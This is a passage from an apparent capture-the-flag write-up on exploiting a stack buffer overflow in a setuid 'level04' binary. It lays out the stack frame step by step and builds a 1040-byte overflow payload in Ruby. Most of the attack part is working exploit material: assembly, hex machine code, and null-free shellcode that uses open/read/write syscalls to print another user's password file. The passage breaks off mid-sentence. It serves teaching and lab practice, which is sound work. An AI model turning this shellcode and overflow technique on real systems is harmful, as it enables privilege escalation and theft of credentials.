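CALL_LENGTH = 5           # one opcode byte plus four displacement bytes


def encode_relative_call(instruction_address, target_address):
    """Bytes of `call target` when the instruction sits at
    instruction_address; the displacement counts from the next instruction."""
    next_instruction = instruction_address + CALL_LENGTH
    displacement = (target_address - next_instruction) & 0xFFFFFFFF
    return bytes([CALL_REL32_OPCODE]) + struct.pack("<I", displacement)


if __name__ == "__main__":
    # Same target, two different locations for the call instruction.
    print(encode_relative_call(0x08048767, 0x0804847C).hex())
    print(encode_relative_call(0x08048060, 0x0804847C).hex())
```

The two encodings differ even though the target is the same, so bytes assembled for one location would jump somewhere else entirely when run from another.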
One easy way to get the right machine code out of those instructions is to put them
into a program we can run and inspect in gdb. Let's make a file named callsystem.asm:
SECTION .data
SECTION .bss
SECTION .text
global _start
_start:
	push DWORD 0xffc323bc	; Push our buffer address onto the stack
	mov eax, 0x804847c	; Move `system`s address into a register
	call eax		; Call `system`

	mov eax, 1		; `exit` syscall
	mov ebx, 0		; Exit code 0
	int 0x80		; Exit
You'll need the nasm assembler locally to make anything out of that, and we'll
need to know what our target is. We can figure that out by looking at what kinds
of binaries we've been working with thus far:
$ file /levels/level04
/levels/level04: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
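We can assemble callsystem.asm into a 32-bit ELF object with debug symbols using
nasm (-f elf32 selects the output format; without it nasm emits a flat binary),
and link it into an executable with ld (on a 64-bit host, ld also needs
-m elf_i386):
nasm -f elf32 -g -o callsystem.o callsystem.asm
ld -o callsystem callsystem.o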
Now we can attach gdb and look around:
$ gdb ./callsystem
(gdb) break _start
Breakpoint 1 at 0x8048060
(gdb) set disassembly-flavor intel
(gdb) run
Starting program: /vagrant/bin/hello

Breakpoint 1, 0x08048060 in _start ()
(gdb) disassemble
Dump of assembler code for function _start:
=> 0x08048060 <+0>:	push   0xffc323bc
   0x08048065 <+5>:	mov    eax,0x804847c
   0x0804806a <+10>:	call   eax
   0x0804806c <+12>:	mov    eax,0x1
   0x08048071 <+17>:	mov    ebx,0x0
   0x08048076 <+22>:	int    0x80
End of assembler dump.

Ok, so we have a 5-byte push operation, a 5-byte mov and a 2-byte call. Let's
see what they look like:
(gdb) x/5xb 0x08048060
0x8048060 <_start>:	0x68	0xbc	0x23	0xc3	0xff
(gdb) x/5xb 0x08048065
0x8048065 <_start+5>:	0xb8	0x7c	0x84	0x04	0x08
(gdb) x/2xb 0x0804806a
0x804806a <_start+10>:	0xff	0xd0
(gdb) x/12xb 0x08048060
0x8048060 <_start>:	0x68	0xbc	0x23	0xc3	0xff	0xb8	0x7c	0x84
0x8048068 <_start+8>:	0x04	0x08	0xff	0xd0

It's encouraging to see our literal 0xffc323bc and 0x0804847c values peeking
through - we'll be changing those values eventually. Let's get this into a string
using echo -e as before:
$ echo -e "\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0"
h�#���|��
Good, it should look like nonsense. There are lots of other ways to get this
information than building a little runnable binary and attaching gdb to it. I'll
describe one easy way. First make a simpler.asm file:
SECTION .text
push DWORD 0xffc323bc	; Push our buffer address onto the stack
mov eax, 0x804847c	; Move `system`s address into a register
call eax		; Call `system`
Assemble it with nasm -f elf32 -o simpler.o simpler.asm and use objdump to see what's
in simpler.o:
$ objdump -s simpler.o

simpler.o:     file format elf32-i386

Contents of section .text:
 0000 68bc23c3 ffb87c84 0408ffd0           h.#...|.....
Since the only thing in our object file is the code for our instructions, the
entirety of the contents of the .text section is what we need. The 0000 at the
beginning is just the address, the rest of the hex are our bytes. Notice that
they're identical to what we found using gdb.
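Since the two addresses will have to change later, it may be handy to rebuild those 12 bytes without re-running the assembler. Here is a Python sketch under that assumption: the opcodes 0x68, 0xb8 and 0xff 0xd0 are read straight off the gdb dump above, and build_call_system is a hypothetical helper name.

```python
import struct


def build_call_system(buffer_address, system_address):
    """Raw bytes for: push imm32; mov eax, imm32; call eax."""
    push_imm32 = b"\x68" + struct.pack("<I", buffer_address)
    mov_eax_imm32 = b"\xb8" + struct.pack("<I", system_address)
    call_eax = b"\xff\xd0"
    return push_imm32 + mov_eax_imm32 + call_eax


if __name__ == "__main__":
    code = build_call_system(0xFFC323BC, 0x0804847C)
    print(code.hex())
```

Feeding in the level03 values reproduces the bytes from gdb and objdump, so swapping in new addresses should only change the two little-endian immediates.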
Alright, it's finally time to start mucking around with the level04 program itself.
Let's get in there with gdb and poke around:
$ gdb -d /levels /levels/level04
# ...
Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) list
No symbol table is loaded.  Use the "file" command.

Bummer. Hopefully we can rely purely on the source and disassembly to figure
things out. Let's get in there and see what fun looks like:
(gdb) break fun
Breakpoint 1 at 0x804848d
(gdb) run abcd
Breakpoint 1, 0x0804848d in fun ()
(gdb) disassemble
Dump of assembler code for function fun:
   0x08048484 <+0>:	push   ebp
   0x08048485 <+1>:	mov    ebp,esp
   0x08048487 <+3>:	sub    esp,0x418
=> 0x0804848d <+9>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048490 <+12>:	mov    DWORD PTR [esp+0x4],eax
   0x08048494 <+16>:	lea    eax,[ebp-0x408]
   0x0804849a <+22>:	mov    DWORD PTR [esp],eax
   0x0804849d <+25>:	call   0x8048388 <strcpy@plt>
   0x080484a2 <+30>:	leave
   0x080484a3 <+31>:	ret
End of assembler dump.
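The offsets in that disassembly already tell us how far buf is from the interesting parts of the frame. Here is a Python sketch of the arithmetic, assuming the conventional layout where [ebp] holds the saved ebp and [ebp+4] holds the return address. frame_layout is a made-up helper, and the sample ebp value is the one this run ends up with after the function's preamble.

```python
BUF_OFFSET_BELOW_EBP = 0x408  # from `lea eax,[ebp-0x408]`
SAVED_EBP_SIZE = 4            # the value stored by `push ebp`


def bytes_before_return_address(buf_offset=BUF_OFFSET_BELOW_EBP):
    """Distance from buf[0] to the saved return address, assuming
    [ebp] = saved ebp and [ebp+4] = return address."""
    return buf_offset + SAVED_EBP_SIZE


def frame_layout(ebp, buf_offset=BUF_OFFSET_BELOW_EBP):
    """Addresses of buf and of the return-address slot for a given ebp."""
    return {
        "buf": (ebp - buf_offset) & 0xFFFFFFFF,
        "return_slot": (ebp + SAVED_EBP_SIZE) & 0xFFFFFFFF,
    }


if __name__ == "__main__":
    print(bytes_before_return_address())
    layout = frame_layout(0xFFA3F1F8)
    print({name: hex(address) for name, address in layout.items()})
```

Note that 0x408 is a bit more than the 1024 bytes declared for buf, so the compiler has left some slack between the end of the array and the saved ebp.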

This whole thing is pretty much just interacting with the stack (I'm noticing a
trend...), and it's confusing and important for what we're doing, so I'm going
to draw some pictures of the stack. On entry, it looks like this:
  esp  ebp      Address       Value
   |    |
   |    |
   |    |    +------------+------------+
   |    +--->| 0xffa3f218 | 0xffa3f298 |                         <-+
   |         +------------+------------+                           |
   |                      .                                        | `main`s
   |                      .                                        | stack
   |                      .                                        | frame
   |         +------------+------------+                           |
   |         | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   +-------->| 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
             +------------+------------+

The first thing that happens is a standard stack-frame creation preamble. First,
the current ebp is saved onto the stack with push ebp. Now it looks like this:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    +--->| 0xffa3f218 | 0xffa3f298 |                         <-+
   |         +------------+------------+                           |
   |                      .                                        | `main`s
   |                      .                                        | stack
   |                      .                                        | frame
   |         +------------+------------+                           |
   |         | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   |         | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |         +------------+------------+
   +-------->| 0xffa3f1f8 | 0xffa3f218 |
             +------------+------------+

Then, ebp is moved to the current stack position with mov ebp, esp:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   +----+--->| 0xffa3f1f8 | 0xffa3f218 |
             +------------+------------+

Finally, fun allocates a 1048-byte stack frame with sub esp, 0x418:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   |    +--->| 0xffa3f1f8 | 0xffa3f218 |                         <-+
   |         +------------+------------+                           |
   |                      .                                        | `fun`s
   |                      .                                        | stack
   |                      .                                        | frame
   |         +------------+------------+                           |
   +-------->| 0xffa3ede0 | 0x???????? |                         <-+
             +------------+------------+

Either for alignment reasons, or just to rub in how dumb I am, the compiler
allocates 1024 bytes of the stack frame for buf, starting after two empty
words under the top of the frame. The frame ends with two more inexplicable
blank words, and two words which are eventually used to pass the two arguments
to strcpy:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   |    +--->| 0xffa3f1f8 | 0xffa3f218 |                         <-+
   |         +------------+------------+                           |
   |         | 0xffa3f1f4 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1f0 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1ec |            |             <-+           |
   |         +------------+------------+               |           |
   |                      .                            | 1024      |
   |                      .                            | byte      | `fun`s
   |                      .                            | `buf`     | stack
   |         +------------+------------+               |           | frame
   |         | 0xffa3edf0 |            |             <-+           |
   |         +------------+------------+                           |
   |         | 0xffa3edec |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede8 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede4 |            |                           |
   |         +------------+------------+                           |
   +-------->| 0xffa3ede0 |            |                         <-+
             +------------+------------+
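The addresses in that picture all follow from three numbers in the disassembly, so they're easy to double-check. Here's a small Python sketch of the arithmetic; the ebp value is just the one from my diagrams (it changes from run to run), and the variable names are mine:

```python
# Frame layout of `fun`, derived from the disassembly and the diagram above.
EBP = 0xffa3f1f8      # ebp after the prologue (value taken from the diagram)
FRAME_SIZE = 0x418    # from `sub esp,0x418`
BUF_OFFSET = 0x408    # from `lea eax,[ebp-0x408]`
BUF_LEN = 1024        # size of buf
WORD = 4              # 32-bit words

esp = EBP - FRAME_SIZE
buf_start = EBP - BUF_OFFSET
buf_last_word = buf_start + BUF_LEN - WORD

# Empty words between the end of buf and the saved ebp.
words_above_buf = (EBP - (buf_start + BUF_LEN)) // WORD
# Two blank words plus the two argument slots for strcpy.
words_below_buf = (buf_start - esp) // WORD
# Distance from the start of buf to the saved return address.
bytes_to_return_address = (EBP + WORD) - buf_start

print(hex(esp), hex(buf_start), hex(buf_last_word))
print(words_above_buf, words_below_buf, bytes_to_return_address)
```

The last number is the one that matters later: the return address sits 1036 bytes past the start of buf.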

Let's look at how that strcpy call works. First, we copy the str pointer into
the second-argument slot at esp+4 with:
mov    eax,DWORD PTR [ebp+0x8]
mov    DWORD PTR [esp+0x4],eax
Now our stack looks like this:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   |    +--->| 0xffa3f1f8 | 0xffa3f218 |                         <-+
   |         +------------+------------+                           |
   |         | 0xffa3f1f4 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1f0 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1ec |            |             <-+           |
   |         +------------+------------+               |           |
   |                      .                            | 1024      |
   |                      .                            | byte      | `fun`s
   |                      .                            | `buf`     | stack
   |         +------------+------------+               |           | frame
   |         | 0xffa3edf0 |            |             <-+           |
   |         +------------+------------+                           |
   |         | 0xffa3edec |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede8 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede4 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   +-------->| 0xffa3ede0 |            |                         <-+
             +------------+------------+

Now, we calculate the start address of buf, and put it on the top of the stack:
lea    eax,[ebp-0x408]
mov    DWORD PTR [esp],eax
Directly before and directly after the call to strcpy, our stack looks like
this:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   |    +--->| 0xffa3f1f8 | 0xffa3f218 |                         <-+
   |         +------------+------------+                           |
   |         | 0xffa3f1f4 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1f0 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3f1ec |            |             <-+           |
   |         +------------+------------+               |           |
   |                      .                            | 1024      |
   |                      .                            | byte      | `fun`s
   |                      .                            | `buf`     | stack
   |         +------------+------------+               |           | frame
   |         | 0xffa3edf0 |            |             <-+           |
   |         +------------+------------+                           |
   |         | 0xffa3edec |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede8 |            |                           |
   |         +------------+------------+                           |
   |         | 0xffa3ede4 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   +-------->| 0xffa3ede0 | 0xffa3edf0 |----> beginning of `buf` <-+
             +------------+------------+

Let's see what happens after the call. The leave instruction is basically just
sugar for the two instructions mov esp, ebp and pop ebp. This is what the stack
looks like afterwards:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    +--->| 0xffa3f218 | 0xffa3f298 |                         <-+
   |         +------------+------------+                           |
   |                      .                                        | `main`s
   |                      .                                        | stack
   |                      .                                        | frame
   |         +------------+------------+                           |
   |         | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   +-------->| 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
             +------------+------------+

With one instruction, we're back to our original picture. Neat. Now all that's left
is the ret instruction, which simply pops the last value off the stack, and jumps
to it. After ret, execution will continue at the address 0x080484dc.
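If the pictures are hard to keep in your head, the whole call/prologue/leave/ret dance can be replayed with a toy model. This is only a sketch: the Stack32 class and call_and_return function are made up for illustration, and the addresses are the ones from the diagrams above.

```python
class Stack32:
    """Toy model of a 32-bit x86 stack: a dict of word-aligned addresses."""

    def __init__(self, esp, ebp):
        self.mem = {}
        self.esp = esp
        self.ebp = ebp

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value


def call_and_return():
    # State in main just before `call fun`: the str argument is on top.
    s = Stack32(esp=0xffa3f200, ebp=0xffa3f218)
    s.mem[s.esp] = 0xffa3f92b

    s.push(0x080484dc)      # `call fun` pushes the return address

    s.push(s.ebp)           # push ebp
    s.ebp = s.esp           # mov ebp, esp
    s.esp -= 0x418          # sub esp, 0x418
    in_frame = (s.esp, s.ebp)

    s.esp = s.ebp           # leave, part 1: mov esp, ebp
    s.ebp = s.pop()         # leave, part 2: pop ebp
    after_leave = (s.esp, s.ebp)

    eip = s.pop()           # ret: pop the return address and jump to it
    return in_frame, after_leave, eip, s.esp


in_frame, after_leave, eip, final_esp = call_and_return()
print([hex(v) for v in in_frame], [hex(v) for v in after_leave], hex(eip))
```

Whatever value sits in the return-address slot when ret runs is where execution goes next, which is exactly what we're about to abuse.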
Ok whew, all that was just to make sure we have our mental model straight for
the real work ahead. Notice that the return location is stored extremely close to
buf, and there's nothing stopping us from overwriting it. Putting together the
pieces, we want to inject the malicious string of assembly we constructed earlier
into memory somewhere, and overwrite the return address from fun to point to it.
We also need to include the actual cat command that we're going to pass to the
system function call. Here's one way to lay out our buffer:
The command:
cat /etc/level05/.password ; #
|------------30--------------|

The function call:
\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0
|--------------------12------------------------|

The padding:
<any character that isn't \0>
|----------994--------------|

The overwritten return address:
\x??\x??\x??\x??
|------4-------|

The padding is the magic that gets everything going. It should push the address
we'll be crafting in a moment into the return address from fun. Let's try it
with 0x12345678 for our return address. We'll get a segfault, but we'll know we're
on the right track. I'm going to make a ruby file make_payload.rb to make the
actual payload:
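# make_payload.rb: 30 + 12 + 994 + 4 = 1040 bytes
command = "cat /etc/level05/.password ; #"                 # 30 bytes
code = "\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0"  # 12 bytes of machine code
padding = 'a' * 994                                        # filler up to the return address
addr = "\x78\x56\x34\x12"                                  # 0x12345678, little-endian
File.open("payload", "wb") { |f| f.write(command + code + padding + addr) }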
Once we run it, we should have what we want in payload. Alright, let's see
what happens when we use that as input to the program:
$ gdb /levels/level04
# ...
Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble fun
Dump of assembler code for function fun:
   0x08048484 <+0>:	push   ebp
   0x08048485 <+1>:	mov    ebp,esp
   0x08048487 <+3>:	sub    esp,0x418
   0x0804848d <+9>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048490 <+12>:	mov    DWORD PTR [esp+0x4],eax
   0x08048494 <+16>:	lea    eax,[ebp-0x408]
   0x0804849a <+22>:	mov    DWORD PTR [esp],eax
   0x0804849d <+25>:	call   0x8048388 <strcpy@plt>
   0x080484a2 <+30>:	leave
   0x080484a3 <+31>:	ret
End of assembler dump.
(gdb) break *0x080484a2
Breakpoint 1 at 0x80484a2
(gdb) run "`cat payload`"
Starting program: /levels/level04 "`cat payload`"

Breakpoint 1, 0x080484a2 in fun ()
(gdb) x/1xw $ebp+4
0xff86e98c:	0x12345678

Well look at that! There's our injected address right where we wanted it! Now,
let's start making some numbers real. Ok, let's find the address of system,
because our payload needs that:
(gdb) print system
No symbol table is loaded.  Use the "file" command.

Hmmm, ok, so gdb doesn't work very well without debug symbols. Surely we can
find it with nm:
$ nm /levels/level04 | grep system
$

So here's the thing: that symbol doesn't exist in our binary at all. There was no
reason to link it in, because the program never uses it! Clearly we need a new
approach. One option would be to find another function
that is linked in that could be made to print the contents of a file. In terms
of libc functions, we have exit, printf, puts, and strcpy. Ok, so if we
read in the contents of /home/level05/.password, then we can probably figure
out how to print it out with printf or puts. But how do we read the file?
We don't have the read symbol, so we seem to be back at square one.
At this point, we need to understand what those magical libc functions actually
do. The long story short is that functions like system and read end up calling
Linux system calls, and even longer story even shorter, we can do that ourselves
by using the 0x80 interrupt vector. It works like this: you put the number of
the system call into eax, and the arguments to the call into ebx, ecx, and edx,
then you execute int 0x80, and the kernel takes over. You can find the list of
supported syscalls with their numbers in /usr/include/asm/unistd_32.h, and
you can find their signatures in man 2 <syscall>. Note, there is no system
syscall. I suspect the system function eventually calls execve after doing
some parameter parsing.
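To keep the convention straight, here's a little Python sketch that just spells out which register gets what. The syscall numbers are the handful used in this write-up; the registers_for helper is hypothetical, and it only models the three argument registers mentioned above.

```python
# i386 `int 0x80` convention: syscall number in eax, arguments in ebx, ecx, edx.
SYSCALL_NUMBERS = {"exit": 1, "read": 3, "write": 4, "open": 5, "execve": 11}
ARG_REGISTERS = ("ebx", "ecx", "edx")


def registers_for(name, *args):
    """Return the register assignment needed before executing `int 0x80`."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("this sketch only models three argument registers")
    regs = {"eax": SYSCALL_NUMBERS[name]}
    regs.update(zip(ARG_REGISTERS, args))
    return regs


# write(1, Buf, 16): stdout, a buffer address, and a length
print(registers_for("write", 1, "Buf", 16))
```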
I'm sure we could figure out how to use execve to run our cat command, but
I think there's a better way. The cat command with a single argument merely
reads the file named by that argument into memory, and writes it out to standard
out. This can be done with three syscalls: open to get a descriptor for a file
by name, read to read from that descriptor into memory, and write to write
to the (already open) descriptor for standard out.  Let's write some code for
this! First, we'll make a full version that runs as a standalone program, so we
can test that it works:
SECTION .bss
	BufLen equ 16
	Buf resb BufLen

SECTION .data
	FileName db "blah", 0x0

SECTION .text
global _start			; Entry point for ld

_start:
	mov eax, 5		; `open` syscall
	mov ebx, FileName	; Open FileName
	mov ecx, 0		; Read-only
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov eax, 3		; `read` syscall
	mov ecx, Buf		; Read into Buf
	mov edx, BufLen		; Read BufLen bytes
	int 0x80		; Make syscall

	mov eax, 4		; `sys_write` syscall
	mov ebx, 1		; Use stdout
	mov ecx, Buf		; Write from Buf
	mov edx, BufLen		; Write BufLen bytes
	int 0x80		; Make syscall

	mov eax, 1		; `exit` syscall
	mov ebx, 0		; Exit code 0
	int 0x80		; Exit
Now you should be able to "cat" a file named "blah":
$ nasm -f elf32 -g -o level04.o level04.asm
$ ld -o level04 level04.o
$ echo "blah" > blah
$ ./level04
blah
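For comparison, here's roughly the same open/read/write sequence in Python, using the os module's thin wrappers around those syscalls. It's a sketch rather than a translation: tiny_cat is a name I made up, and unlike the assembly it only writes as many bytes as it actually read instead of the full 16-byte buffer.

```python
import os


def tiny_cat(path, out_fd=1, buf_len=16):
    """Copy up to buf_len bytes of `path` to out_fd, one syscall per step."""
    fd = os.open(path, os.O_RDONLY)      # open(path, O_RDONLY)
    try:
        data = os.read(fd, buf_len)      # read(fd, buf, buf_len)
    finally:
        os.close(fd)
    return os.write(out_fd, data)        # write(out_fd, buf, len(data))
```

Calling tiny_cat("blah") in the directory from the example above should print the file's first 16 bytes to standard out.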
Ok good, but now we need to make this more suitable for injection. We won't have
the luxury of running in the .text section or referencing any symbols at all.
We'll be running purely from within a chunk of data memory (in the real exploit,
the stack buffer). Let's see if we can mimic this setup by moving our code into
.data and keep our program working:
SECTION .data
	mov esi, 0x8049088	; Keep track of location of our code
	mov eax, 5		; `open` syscall
	mov ebx, esi		; Open FileName
	add ebx, 91		; Code takes 75 bytes, buffer takes 16
	mov ecx, 0		; Read-only
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov eax, 3		; `read` syscall
	mov ecx, esi
	add ecx, 75		; 75 bytes of code, then buffer starts
	mov edx, 16		; Read BufLen bytes
	int 0x80		; Make syscall

	mov eax, 4		; `sys_write` syscall
	mov ebx, 1		; Use stdout
	mov ecx, esi
	add ecx, 75		; Write from Buf
	mov edx, 16		; Write BufLen bytes
	int 0x80		; Make syscall

	mov eax, 1		; `exit` syscall
	mov ebx, 0		; Exit code 0
	int 0x80		; Exit

	db 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
	db "blah", 0x0
	
SECTION .text
global _start			; Entry point for ld
	
_start:
	jmp 0x8049088
Note that the chunk of code in .data is fully self-contained. If we manage to
jump to it, and if it actually lives at 0x8049088, it will print the contents of
the blah file. Good, let's turn this runnable program into the 1040-byte string
payload we need to overflow our buffer the way we want. We'll replace the string
"blah" with "/home/level05/.password" to get the real file we want, remove all
the support code, add a word at the end with the address of our code, and pad
before it with no-ops to get the right length. We also need to add BITS 32 in
anticipation of building a flat binary, which defaults to 16-bit mode:
	BITS 32

	mov esi, 0x8049088	; Keep track of location of our code
	mov eax, 5		; `open` syscall
	mov ebx, esi		; Open FileName
	add ebx, 91		; Code takes 75 bytes, buffer takes 16
	mov ecx, 0		; Read-only
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov eax, 3		; `read` syscall
	mov ecx, esi
	add ecx, 75		; 75 bytes of code, then buffer starts
	mov edx, 16		; Read BufLen bytes
	int 0x80		; Make syscall

	mov eax, 4		; `sys_write` syscall
	mov ebx, 1		; Use stdout
	mov ecx, esi
	add ecx, 75		; Write from Buf
	mov edx, 16		; Write BufLen bytes
	int 0x80		; Make syscall

	mov eax, 1		; `exit` syscall
	mov ebx, 0		; Exit code 0
	int 0x80		; Exit

	db 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
	db "/home/level05/.password", 0x0

	times 921 nop

	dd 0x8049088
Now we generate a flat binary and make sure it's the right size:
$ nasm -f bin -o level04.o level04.asm
$ wc -c level04.o
1040 level04.o
There's a minor but interesting problem here. We can't use scp to get our payload
over to the ctf machine. There are a number of ways to work around this, but I
ended up copying the hex version of it from the output of the xxd command locally,
and pasting it as input to xxd remotely:
$ xxd -p level04.o | pbcopy # Local
$ echo "66be88..." > payload.hex # Remote
$ xxd -p -r < payload.hex > payload
$ wc -c payload
1040
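If xxd isn't handy on one side, the same hex round trip is easy to do in Python. This is just a sketch with made-up helper names; the 60-character line width mimics the plain hex dump that xxd -p produces.

```python
def to_hex_text(payload: bytes, width: int = 60) -> str:
    """Plain hex dump of payload, `width` hex characters per line."""
    text = payload.hex()
    return "\n".join(text[i:i + width] for i in range(0, len(text), width))


def from_hex_text(text: str) -> bytes:
    """Inverse of to_hex_text; whitespace and newlines are ignored."""
    return bytes.fromhex("".join(text.split()))
```

Comparing the byte count before and after, as with wc -c above, is a cheap way to catch a botched copy and paste.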
Ok, we still don't expect this to work, but we're getting closer. Let's run it
and see what things look like:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/32xb $ebp-0x408
0xffd662f0:	0x66	0xbe	0x88	0x90	0x04	0x08	0x66	0xb8
0xffd662f8:	0x05	0x66	0x89	0xf3	0x66	0x83	0xc3	0x5b
0xffd66300:	0x66	0xb9	0xcd	0x80	0x66	0x89	0xc3	0x66
0xffd66308:	0xb8	0x03	0x66	0x89	0xf1	0x66	0x83	0xc1

Hmm, our bytes look sorta right, but not quite. Let's look more closely at the
beginning of the hexdump:
0000000: 66 be 88 90 04 08 66 b8  f.....f.
0000008: 05 00 00 00 66 89 f3 66  ....f..f
0000010: 83 c3 5b 66 b9 00 00 00  ..[f....
0000018: 00 cd 80 66 89 c3 66 b8  ...f..f.

Ah, it looks good through 66 b8 05, but then the next byte is 66, when it
should be 00 three times! Our null bytes never made it into the buffer. The
shell's command substitution appears to have dropped them on the way in, and even
if it hadn't, strcpy stops copying at the first null byte. How annoying. We need
to write a new version of our payload with null bytes carefully avoided. Here goes:
	BITS 32

	mov esi, 0x08049088	; Keep track of location of our code
	mov al, 5		; `open` syscall
	mov ebx, esi		; Open FileName
	add ebx, 67		; Code takes 51 bytes, buffer takes 16
	xor ecx, ecx		; Read-only
	mov BYTE [esi+90], cl	; Need 0x0 as last byte in filename for open call
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov al, 3		; `read` syscall
	mov ecx, esi
	add ecx, 51		; 51 bytes of code, then buffer starts
	mov dl, 16		; Read BufLen bytes
	int 0x80		; Make syscall

	mov al, 4		; `sys_write` syscall
	mov bl, 1		; Use stdout
	mov ecx, esi
	add ecx, 51		; Write from Buf
	mov dl, 16		; Write BufLen bytes
	int 0x80		; Make syscall

	mov al, 1		; `exit` syscall
	xor ebx, ebx		; Exit code 0
	int 0x80		; Exit

	db 0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1
	db "/home/level05/.password", 0x1

	times 945 nop

	dd 0x08049088
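Rather than eyeballing hexdumps, a payload can be scanned for null bytes before it ever leaves the local machine. Here's a minimal Python sketch; null_offsets is a hypothetical helper, and the byte strings are the standard 32-bit encodings of the instructions named in the comments.

```python
def null_offsets(blob: bytes) -> list:
    """Return the offset of every 0x00 byte in blob."""
    return [i for i, b in enumerate(blob) if b == 0]


MOV_EAX_5 = bytes.fromhex("b805000000")    # mov eax, 5  (32-bit immediate)
MOV_AL_5 = bytes.fromhex("b005")           # mov al, 5   (8-bit immediate)
MOV_ECX_0 = bytes.fromhex("b900000000")    # mov ecx, 0
XOR_ECX_ECX = bytes.fromhex("31c9")        # xor ecx, ecx

for name, blob in [("mov eax, 5", MOV_EAX_5), ("mov al, 5", MOV_AL_5),
                   ("mov ecx, 0", MOV_ECX_0), ("xor ecx, ecx", XOR_ECX_ECX)]:
    print(name, null_offsets(blob))
```

Running the same function over the whole assembled payload file should come back empty before it's worth transferring.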
A lot of our null bytes were coming from moving 4-byte values that were actually
only 1-byte values, thus leaving the top 3 bytes as 0. The rest were coming from
data initialization. In the case of the buffer, it doesn't matter what it is
initially since we never use the initialized values, but in the case of the file
name, we have to set its last byte back to 0 before passing it to the open call
or it won't find the proper end of our string. Of course after changing instructions
we had to recalculate all the addresses and add some more nops. After transferring
